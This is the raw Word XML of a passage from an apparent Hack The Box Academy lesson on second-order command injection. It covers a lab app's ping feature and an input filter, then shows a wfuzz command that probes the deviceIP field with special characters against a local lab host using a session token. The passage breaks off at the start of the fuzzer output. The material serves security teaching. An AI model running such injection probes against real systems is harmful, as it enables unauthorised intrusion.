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00" w:afterAutospacing="1" w:before="100" w:beforeAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Second-Order Command Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="0" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="_x0000_i102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0" o:spid="_x0000_s0" o:spt="1" type="#_x0000_t1" style="width:0.00pt;height:1.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;visibility:visible;" fillcolor="#A0A0A0" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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As our final ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ample of a second-order vulnerability, we will explore a second-order command injection vulnerability. It is often apparent when a web application executes system commands. However, since command injection is a common and severe vulnerability, web develope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">rs often secure these obvious code execution entry points with proper filters, making command injection impossible. Though, many web applications implement additional tasks in the background that interact with the operating system. An external attacker oft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">en does not know about these background tasks as they are not displayed in the web application. Therefore, checking all input fields for potential command injection issues is crucial, even if there does not seem to be an obvious code execution entry point.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="0" cy="19050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="_x0000_i1026"/>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 o:spid="_x0000_s1" o:spt="1" type="#_x0000_t1" style="width:0.00pt;height:1.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;visibility:visible;" fillcolor="#A0A0A0" stroked="f"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing the Web Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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After registering a test user in our sample web application, we can see a simple admin dashboard:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="2344420"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="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01663" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId8"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="234442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1.30pt;height:184.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId8" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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In the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint, the web application allows us to set and ping an IP address, displaying the result back to us:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="0"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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="1838325"/>
                <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
                <wp:docPr id="4"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81034" name="Picture 7" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId9"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="18383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1.30pt;height:144.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId9" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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This functionality is an obvious entry point for a potential code execution vulnerability, as the web application executes the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> command with the IP address we supplied in our profile; if the web application uses system commands without proper sanitation, there is a command injection vulnerability.</w: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We can apply the methodology taught in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="https://academy.hackthebox.com/module/details/109" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">Command Injections</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to test for this potential issue. Let us try a simple command execution payload that executes the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. However, as we can see, the web application rejects our payload due to invalid characters:</w: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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5731510" cy="1223010"/>
                <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                <wp:docPr id="5"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pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId11"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="122300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1.30pt;height:96.30pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="f">
                <v:imagedata r:id="rId11" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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So we know that the web application implements a filter that prevents us from injecting arbitrary characters into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">deviceIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter. To achieve code execution, we need to determine if we can inject any characters that would trigger executing an additional command. Assuming the filter blocks certain characters, we can quickly achieve this using a fuzzer such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">wfuzz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Let us determine if we can inject any special characters by using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tooltip="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/special-chars.txt" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t xml:space="preserve">special-chars.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> wordlist from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since a successful change of the IP address results in an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code and an unsuccessful attempt results in an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP 400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code, we can match all 200 status codes to filter all blocked characters:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">yovecio@htb[/htb]$ $wfuzz -u http://172.17.0.2:1337/update -w ./special-chars.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">-d '{"deviceIP":"FUZZ","password":""}' -H 'Content-Type: application/json' -b 'session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imh0Yi1zdGRudCIsImlhdCI6MTY5MjM1MzI2NCwiZXhwIjoxNjkyMzU2ODY0fQ.O2LrltoEhG15jPB1xBZs4cMYfez4HkdB6y5KZ2aZb8Y' --sc 200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">********************************************************</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">* Wfuzz 3.1.0 - The Web Fuzzer                         *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">********************************************************</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: http://172.17.0.2:1337/update</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Total requests: 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">=====================================================================</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">ID           Response   Lines    Word       Chars       Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">=====================================================================</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="non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0" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
